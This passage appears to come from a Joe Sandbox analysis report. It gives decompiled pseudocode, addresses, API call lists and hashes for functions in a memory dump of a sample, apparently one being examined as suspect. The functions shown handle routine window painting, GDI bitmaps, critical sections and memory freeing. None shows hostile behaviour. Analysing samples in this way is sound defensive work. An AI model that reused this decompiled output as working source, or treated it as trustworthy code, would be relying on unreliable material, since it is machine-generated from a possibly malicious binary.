						 *((intOrPtr*)(_t105 + 0xc)) = 1;
					} else {
						_t118 = _t94 - 0x2b;
						if(_t118 == 0) {
							E00444D40(_t150);
							_t105 = _v8;
							if( *((char*)(_t105 + 0x22f)) == 2) {
								if(E00445268(_v8) == 0 || E00444D8C(_t138, _t150) == 0) {
									_t146 = 1;
								} else {
									_t146 = 0;
								}
								_t105 = E004420AC( *(_v8 + 0x254), _t146);
							}
						} else {
							if(_t118 != 0x45) {
								_t105 = E00444D40(_t150);
							} else {
								E00444D40(_t150);
								_t105 = _v12;
								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
									_t105 = _v12;
									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
								}
							}
						}
					}
					return _t105;
				}
			}

























                                  0x00444dcc
                                  0x00444dcc
                                  0x00444dcc
                                  0x00444dcc
                                  0x00444dcd
                                  0x00444dcf
                                  0x00444dd2
                                  0x00444dd5
                                  0x00444ddd
                                  0x00444de0
                                  0x00444ef0
                                  0x00444ef7
                                  0x00444f0f
                                  0x00444f0f
                                  0x00444f14
                                  0x00444f15
                                  0x00444f1a
                                  0x00444f1d
                                  0x00444f24
                                  0x00444f34
                                  0x00444f42
                                  0x00444f4a
                                  0x00444f50
                                  0x00444f63
                                  0x00444f63
                                  0x00444f6e
                                  0x00444f75
                                  0x00444f78
                                  0x00444f7b
                                  0x00444f84
                                  0x00000000
                                  0x00444f94
                                  0x00444f99
                                  0x00444de6
                                  0x00444de6
                                  0x00444de9
                                  0x00444e29
                                  0x00444e37
                                  0x00444e45
                                  0x00444e54
                                  0x00444e70
                                  0x00444e8f
                                  0x00444e8f
                                  0x00444e94
                                  0x00444e97
                                  0x00444deb
                                  0x00444deb
                                  0x00444dee
                                  0x00444ea4
                                  0x00444eaa
                                  0x00444eb4
                                  0x00444ec4
                                  0x00444ed5
                                  0x00444ed1
                                  0x00444ed1
                                  0x00444ed1
                                  0x00444ee0
                                  0x00444ee0
                                  0x00444df4
                                  0x00444df7
                                  0x00444fa2
                                  0x00444dfd
                                  0x00444dfe
                                  0x00444e04
                                  0x00444e0b
                                  0x00444e11
                                  0x00444e14
                                  0x00444e14
                                  0x00444e0b
                                  0x00444df7
                                  0x00444dee
                                  0x00444fab
                                  0x00444fab

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                  • String ID:
                                  • API String ID: 901200654-0
                                  • Opcode ID: 7045648023c2386d6f2b84c9f25314f507e68e8564f2c2ff1b3a0fc32e253074
                                  • Instruction ID: 55874e7d0bff21dc4238f3ac22219e850c0d777c57e19ed545ceddbfa13ebdbb
                                  • Opcode Fuzzy Hash: 7045648023c2386d6f2b84c9f25314f507e68e8564f2c2ff1b3a0fc32e253074
                                  • Instruction Fuzzy Hash: 8251EB74904109EFDB10DBE9C989E9DB7F8AF88314F6581A6E404AB391D738AE45CB08
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00418D24, Relevance: 9.1, APIs: 6, Instructions: 109threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E00418D24(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr* _v12;
				long _v16;
				char _v20;
				char _v24;
				long _t22;
				char _t29;
				void* _t53;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr _t63;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xffffffec;
				_push(__esi);
				_push(__edi);
				_t53 = __eax;
				_t22 = GetCurrentThreadId();
				_t62 =  *0x44e110; // 0x44f030
				if(_t22 !=  *_t62) {
					_v24 = GetCurrentThreadId();
					_v20 = 0;
					_t61 =  *0x44dfb4; // 0x4101d0
					E0040B168(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
					E0040384C();
				}
				if(_t53 <= 0) {
					E00418CFC();
				} else {
					E00418D08(_t53);
				}
				_v16 = 0;
				_push(0x44f868);
				L00405DD0();
				_push(_t72);
				_push(0x418eb2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v16 = InterlockedExchange( &E0044D3E8, _v16);
				_push(_t72);
				_push(0x418e93);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				_v5 = _t29;
				if(_v5 == 0) {
					L15:
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(E00418E9A);
					return E004030D8(_v16);
				} else {
					if( *((intOrPtr*)(_v16 + 8)) > 0) {
						_v12 = E00413524(_v16, 0);
						E00413414(_v16, 0);
						L00405EF8();
						 *[fs:eax] = _t74;
						 *[fs:eax] = _t74;
						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x418e5d, _t72, 0x44f868);
						_pop(_t66);
						 *[fs:eax] = _t66;
						_t67 = 0x418e2e;
						 *[fs:eax] = _t67;
						_push(E00418E64);
						_push(0x44f868);
						L00405DD0();
						return 0;
					} else {
						goto L15;
					}
				}
			}



















                                  0x00418d25
                                  0x00418d27
                                  0x00418d2b
                                  0x00418d2c
                                  0x00418d2d
                                  0x00418d2f
                                  0x00418d34
                                  0x00418d3c
                                  0x00418d43
                                  0x00418d46
                                  0x00418d50
                                  0x00418d5d
                                  0x00418d62
                                  0x00418d62
                                  0x00418d69
                                  0x00418d74
                                  0x00418d6b
                                  0x00418d6d
                                  0x00418d6d
                                  0x00418d7b
                                  0x00418d7e
                                  0x00418d83
                                  0x00418d8a
                                  0x00418d8b
                                  0x00418d90
                                  0x00418d93
                                  0x00418da4
                                  0x00418da9
                                  0x00418daa
                                  0x00418daf
                                  0x00418db2
                                  0x00418db9
                                  0x00418dc4
                                  0x00418dc8
                                  0x00418dc8
                                  0x00418dc8
                                  0x00418dca
                                  0x00418dd1
                                  0x00418e7d
                                  0x00418e7f
                                  0x00418e82
                                  0x00418e85
                                  0x00418e92
                                  0x00418dd7
                                  0x00418e77
                                  0x00418de6
                                  0x00418dee
                                  0x00418df8
                                  0x00418e08
                                  0x00418e16
                                  0x00418e21
                                  0x00418e26
                                  0x00418e29
                                  0x00418e47
                                  0x00418e4a
                                  0x00418e4d
                                  0x00418e52
                                  0x00418e57
                                  0x00418e5c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00418e77

                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00418D2F
                                  • GetCurrentThreadId.KERNEL32 ref: 00418D3E
                                    • Part of subcall function 00418CFC: ResetEvent.KERNEL32(00000184,00418D79,?,?,00000000), ref: 00418D02
                                  • RtlEnterCriticalSection.KERNEL32(0044F868,?,?,00000000), ref: 00418D83
                                  • InterlockedExchange.KERNEL32(0044D3E8,?), ref: 00418D9F
                                  • RtlLeaveCriticalSection.KERNEL32(0044F868,00000000,00418E93,?,00000000,00418EB2,?,0044F868,?,?,00000000), ref: 00418DF8
                                  • RtlEnterCriticalSection.KERNEL32(0044F868,00418E64,00418E93,?,00000000,00418EB2,?,0044F868,?,?,00000000), ref: 00418E57
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                  • String ID:
                                  • API String ID: 2189153385-0
                                  • Opcode ID: d4cd307b9d9a8597e97f57c9782096fd8b62303046f86261219f4dd5f51558f8
                                  • Instruction ID: 91d84d69db5769fe762a09fbff6e4525cf684ef7422af7b6cc090730de55e960
                                  • Opcode Fuzzy Hash: d4cd307b9d9a8597e97f57c9782096fd8b62303046f86261219f4dd5f51558f8
                                  • Instruction Fuzzy Hash: 4E31F530A04744AFE701DF69D852A9AB7F9EF49704F6188BFF400E6691DB3C5D80CA29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041DB84, Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E0041DB84(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				signed short _v44;
				int _t36;
				signed int _t37;
				signed short _t38;
				signed int _t39;
				signed short _t43;
				signed int* _t47;
				signed int _t51;
				intOrPtr _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t68 = _t69;
				_t70 = _t69 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t47 = _a8;
				_v24 = _v16 << 4;
				_v20 = E004077D4(_v24, __eflags);
				 *[fs:edx] = _t70;
				_t51 = _v24;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x41de7b, _t68, __edi, __esi, __ebx, _t67);
				if(( *_t47 | _t47[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t47;
					 *(_t36 + 4) = _t47[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_t36 = GetSystemMetrics(0xc);
					 *(_a4 + 4) = _t36;
				}
				_push(0);
				L004062C0();
				_v44 = _t36;
				if(_v44 == 0) {
					E0041D048(_t51);
				}
				_push(_t68);
				_push(0x41dc6d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t70;
				_push(0xe);
				_t37 = _v44;
				_push(_t37);
				L00406058();
				_push(0xc);
				_t38 = _v44;
				_push(_t38);
				L00406058();
				_t39 = _t37 * _t38;
				if(_t39 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t39;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0041DC74);
				_t43 = _v44;
				_push(_t43);
				_push(0);
				L004064F8();
				return _t43;
			}






















                                  0x0041db85
                                  0x0041db87
                                  0x0041db8d
                                  0x0041db90
                                  0x0041db93
                                  0x0041db96
                                  0x0041db9f
                                  0x0041dbaa
                                  0x0041dbb8
                                  0x0041dbbe
                                  0x0041dbc6
                                  0x0041dbce
                                  0x0041dbeb
                                  0x0041dbf0
                                  0x0041dbf5
                                  0x0041dbd0
                                  0x0041dbda
                                  0x0041dbde
                                  0x0041dbe6
                                  0x0041dbe6
                                  0x0041dbf8
                                  0x0041dbfa
                                  0x0041dbff
                                  0x0041dc06
                                  0x0041dc08
                                  0x0041dc08
                                  0x0041dc0f
                                  0x0041dc10
                                  0x0041dc15
                                  0x0041dc18
                                  0x0041dc1b
                                  0x0041dc1d
                                  0x0041dc20
                                  0x0041dc21
                                  0x0041dc28
                                  0x0041dc2a
                                  0x0041dc2d
                                  0x0041dc2e
                                  0x0041dc37
                                  0x0041dc3d
                                  0x0041dc4f
                                  0x0041dc51
                                  0x0041dc3f
                                  0x0041dc3f
                                  0x0041dc3f
                                  0x0041dc56
                                  0x0041dc59
                                  0x0041dc5c
                                  0x0041dc61
                                  0x0041dc64
                                  0x0041dc65
                                  0x0041dc67
                                  0x0041dc6c

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 0041DBD2
                                  • GetSystemMetrics.USER32 ref: 0041DBDE
                                  • 72E7AC50.USER32(00000000), ref: 0041DBFA
                                  • 72E7AD70.GDI32(00000000,0000000E,00000000,0041DC6D,?,00000000), ref: 0041DC21
                                  • 72E7AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041DC6D,?,00000000), ref: 0041DC2E
                                  • 72E7B380.USER32(00000000,00000000,0041DC74,0000000E,00000000,0041DC6D,?,00000000), ref: 0041DC67
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: MetricsSystem$B380
                                  • String ID:
                                  • API String ID: 3145338429-0
                                  • Opcode ID: 8d7b9b434337f5fc7a35b25fc98d009ad79e50105f6989cdf122ad2c3a5fbb41
                                  • Instruction ID: 1d8e87c9eed3e92d580f4da9f4cabc8a744abd4682a04f08c2fc2fe2e1bb54a1
                                  • Opcode Fuzzy Hash: 8d7b9b434337f5fc7a35b25fc98d009ad79e50105f6989cdf122ad2c3a5fbb41
                                  • Instruction Fuzzy Hash: C43184B4E04204DFDB00DFA5C881ADEBBB5FB49310F11856AF815AB380D778AD41CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041DFDC, Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 45%
                                  			E0041DFDC(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _t29;
				struct tagBITMAPINFO* _t32;
				intOrPtr _t39;
				struct HBITMAP__* _t43;
				void* _t46;

				_t32 = __ecx;
				_t43 = __eax;
				E0041DE8C(__eax, _a4, __ecx);
				_v12 = 0;
				_push(0);
				L00405FC8();
				_v16 = 0;
				_push(_t46);
				_push(0x41e079);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				if(__edx != 0) {
					_push(0);
					_push(__edx);
					_t29 = _v16;
					_push(_t29);
					L004060F0();
					_v12 = _t29;
					_push(_v16);
					L004060C8();
				}
				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E0041E080);
				if(_v12 != 0) {
					_push(0);
					_push(_v12);
					_push(_v16);
					L004060F0();
				}
				return DeleteDC(_v16);
			}











                                  0x0041dfe5
                                  0x0041dfe9
                                  0x0041dff2
                                  0x0041dff9
                                  0x0041dffc
                                  0x0041dffe
                                  0x0041e003
                                  0x0041e008
                                  0x0041e009
                                  0x0041e00e
                                  0x0041e011
                                  0x0041e016
                                  0x0041e018
                                  0x0041e01a
                                  0x0041e01b
                                  0x0041e01e
                                  0x0041e01f
                                  0x0041e024
                                  0x0041e02a
                                  0x0041e02b
                                  0x0041e02b
                                  0x0041e049
                                  0x0041e04f
                                  0x0041e052
                                  0x0041e055
                                  0x0041e05e
                                  0x0041e060
                                  0x0041e065
                                  0x0041e069
                                  0x0041e06a
                                  0x0041e06a
                                  0x0041e078

                                  APIs
                                    • Part of subcall function 0041DE8C: GetObjectA.GDI32(?,00000054), ref: 0041DEA0
                                  • 72E7A590.GDI32(00000000), ref: 0041DFFE
                                  • 72E7B410.GDI32(?,?,00000000,00000000,0041E079,?,00000000), ref: 0041E01F
                                  • 72E7B150.GDI32(?,?,?,00000000,00000000,0041E079,?,00000000), ref: 0041E02B
                                  • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041E042
                                  • 72E7B410.GDI32(?,00000000,00000000,0041E080,?,00000000), ref: 0041E06A
                                  • DeleteDC.GDI32(?), ref: 0041E073
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: B410$A590B150BitsDeleteObject
                                  • String ID:
                                  • API String ID: 3837315262-0
                                  • Opcode ID: 67be1ba285c8e5dade2e7c63aed3f2ab1ab61efcee9f337c8fe9cbee30d784cf
                                  • Instruction ID: 589b6356614231939e9929ce6f3670b692a7e43d8ad09533892c8f7fab249a6c
                                  • Opcode Fuzzy Hash: 67be1ba285c8e5dade2e7c63aed3f2ab1ab61efcee9f337c8fe9cbee30d784cf
                                  • Instruction Fuzzy Hash: 72116A75A44204BFDB10DBAA8C81F9EBBECAB4D700F51846AF914E7281D67899408B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401AC0, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E00401AC0() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x44f5c0 == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401B96);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x44f049 != 0) {
						_push(0x44f5c8);
						L00401358();
					}
					 *0x44f5c0 = 0;
					_t3 =  *0x44f620; // 0x70cac0
					LocalFree(_t3);
					 *0x44f620 = 0;
					_t19 =  *0x44f5e8; // 0x70aa0c
					while(_t19 != 0x44f5e8) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E004013C0(0x44f5e8);
					E004013C0(0x44f5f8);
					E004013C0(0x44f624);
					_t14 =  *0x44f5e0; // 0x70a3d8
					while(_t14 != 0) {
						 *0x44f5e0 =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x44f5e0; // 0x70a3d8
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401b9d);
					if( *0x44f049 != 0) {
						_push(0x44f5c8);
						L00401360();
					}
					_push(0x44f5c8);
					L00401368();
					return 0;
				}
			}










                                  0x00401ac1
                                  0x00401acb
                                  0x00401b9f
                                  0x00401ad1
                                  0x00401ad3
                                  0x00401ad4
                                  0x00401ad9
                                  0x00401adc
                                  0x00401ae6
                                  0x00401ae8
                                  0x00401aed
                                  0x00401aed
                                  0x00401af2
                                  0x00401af9
                                  0x00401aff
                                  0x00401b06
                                  0x00401b0b
                                  0x00401b25
                                  0x00401b1e
                                  0x00401b23
                                  0x00401b23
                                  0x00401b32
                                  0x00401b3c
                                  0x00401b46
                                  0x00401b4b
                                  0x00401b52
                                  0x00401b56
                                  0x00401b5d
                                  0x00401b62
                                  0x00401b67
                                  0x00401b6d
                                  0x00401b70
                                  0x00401b73
                                  0x00401b7f
                                  0x00401b81
                                  0x00401b86
                                  0x00401b86
                                  0x00401b8b
                                  0x00401b90
                                  0x00401b95
                                  0x00401b95

                                  APIs
                                  • RtlEnterCriticalSection.KERNEL32(0044F5C8,00000000,00401B96), ref: 00401AED
                                  • LocalFree.KERNEL32(0070CAC0,00000000,00401B96), ref: 00401AFF
                                  • VirtualFree.KERNEL32(?,00000000,00008000,0070CAC0,00000000,00401B96), ref: 00401B1E
                                  • LocalFree.KERNEL32(0070A3D8,?,00000000,00008000,0070CAC0,00000000,00401B96), ref: 00401B5D
                                  • RtlLeaveCriticalSection.KERNEL32(0044F5C8,00401B9D,0070CAC0,00000000,00401B96), ref: 00401B86
                                  • RtlDeleteCriticalSection.KERNEL32(0044F5C8,00401B9D,0070CAC0,00000000,00401B96), ref: 00401B90
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                  • String ID:
                                  • API String ID: 3782394904-0
                                  • Opcode ID: 3115ad5b4270529c973cc775a0591dd661959e0b6084ed7422f44008e6f5438a
                                  • Instruction ID: 72d7ea340d0b3782bb1bf70e87258d6ae8a1272d8b6a1244c1bfe72803cdf6a3
                                  • Opcode Fuzzy Hash: 3115ad5b4270529c973cc775a0591dd661959e0b6084ed7422f44008e6f5438a
                                  • Instruction Fuzzy Hash: E4115E787047806AF715AFA59842B1A37E4A746744F94407BF401A6AF3E77CA848C72C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00428CE4, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00428CE4(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x44d9d4; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x44d9d4; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x44d9d4; // 0x0
				SetPropA(_a4,  *0x44fb1e & 0x0000ffff, _t27);
				_t31 =  *0x44d9d4; // 0x0
				SetPropA(_a4,  *0x44fb1c & 0x0000ffff, _t31);
				_t35 =  *0x44d9d4; // 0x0
				 *0x44d9d4 = 0;
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}










                                  0x00428ce9
                                  0x00428cec
                                  0x00428cf4
                                  0x00428cfa
                                  0x00428d0c
                                  0x00428d21
                                  0x00428d3c
                                  0x00428d3c
                                  0x00428d41
                                  0x00428d53
                                  0x00428d58
                                  0x00428d6a
                                  0x00428d7b
                                  0x00428d80
                                  0x00428d90
                                  0x00428d98

                                  APIs
                                  • SetWindowLongA.USER32 ref: 00428D0C
                                  • GetWindowLongA.USER32 ref: 00428D17
                                  • GetWindowLongA.USER32 ref: 00428D29
                                  • SetWindowLongA.USER32 ref: 00428D3C
                                  • SetPropA.USER32(?,00000000,00000000), ref: 00428D53
                                  • SetPropA.USER32(?,00000000,00000000), ref: 00428D6A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: LongWindow$Prop
                                  • String ID:
                                  • API String ID: 3887896539-0
                                  • Opcode ID: a70c005da8cd157e396c2ab1f45763d91c44f5100c819d8d323fb196d377f141
                                  • Instruction ID: 75f526b112bcd136e0771fa485fc0ac8b9fbc6e6e52eb9ab7a6e56a464d3a3ea
                                  • Opcode Fuzzy Hash: a70c005da8cd157e396c2ab1f45763d91c44f5100c819d8d323fb196d377f141
                                  • Instruction Fuzzy Hash: F611EFB9501144BFCF00DF99ED84EEA37E8EB09354F104126B915DB2E1D738E9549B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041D834, Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E0041D834(struct HDC__* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				short* _t15;
				void* _t18;
				struct HDC__* _t23;
				void* _t26;
				short* _t31;
				short* _t32;

				_t31 = 0;
				 *_t32 = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E004028B8(_t26, __ecx << 2,  &_v1036);
				} else {
					_push(0);
					L00405FC8();
					_t23 = __eax;
					_t18 = SelectObject(__eax, __eax);
					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
					SelectObject(_t23, _t18);
					DeleteDC(_t23);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E0041D79C(_t32) == 0) {
						E0041D62C( &_v1036, _v1038 & 0x0000ffff);
					}
					_t15 = _t32;
					_push(_t15);
					L00405FF0();
					_t31 = _t15;
				}
				return _t31;
			}













                                  0x0041d83f
                                  0x0041d841
                                  0x0041d849
                                  0x0041d883
                                  0x0041d891
                                  0x0041d84b
                                  0x0041d84b
                                  0x0041d84d
                                  0x0041d852
                                  0x0041d856
                                  0x0041d86f
                                  0x0041d876
                                  0x0041d87c
                                  0x0041d87c
                                  0x0041d89c
                                  0x0041d8a4
                                  0x0041d8ba
                                  0x0041d8ba
                                  0x0041d8bf
                                  0x0041d8c1
                                  0x0041d8c2
                                  0x0041d8c7
                                  0x0041d8c7
                                  0x0041d8d4

                                  APIs
                                  • 72E7A590.GDI32(00000000,00000000,?,?,0041FD23,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041D84D
                                  • SelectObject.GDI32(00000000,00000000), ref: 0041D856
                                  • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,0041FD23,?,?,?,?,0041E90F), ref: 0041D86A
                                  • SelectObject.GDI32(00000000,00000000), ref: 0041D876
                                  • DeleteDC.GDI32(00000000), ref: 0041D87C
                                  • 72E7A8F0.GDI32(?,00000000,?,?,0041FD23,?,?,?,?,0041E90F,00000000,0041E99B), ref: 0041D8C2
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: ObjectSelect$A590ColorDeleteTable
                                  • String ID:
                                  • API String ID: 1056449717-0
                                  • Opcode ID: c922995451abb137bcc4a117749e1c38feb9d58c54b13aabf514f4f0dd1ac872
                                  • Instruction ID: af82ca1c2ff5d2e774fc0e88403b9d5a42cfa73c8bf066b53a78733b1c40521a
                                  • Opcode Fuzzy Hash: c922995451abb137bcc4a117749e1c38feb9d58c54b13aabf514f4f0dd1ac872
                                  • Instruction Fuzzy Hash: FE01B9B190431062E624B76A9C47B9B72FC9FC0758F01C92FB585A72C2E57CCC88835E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041CF24, Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041CF24(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0041C700( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0041C700( *((intOrPtr*)(_t36 + 0x14))));
				if(E0041C7E0( *((intOrPtr*)(_t36 + 0x14))) != 0) {
